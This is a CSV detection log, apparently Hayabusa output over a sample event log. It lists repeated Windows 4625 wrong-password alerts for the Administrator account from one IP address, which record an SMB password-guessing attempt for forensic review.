+2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nwRzAutxa07Y1xE4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OwhvrVBSRa8RcCKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bLBwBys2favoK7BQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3oYpj1rGcsOWNSs7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
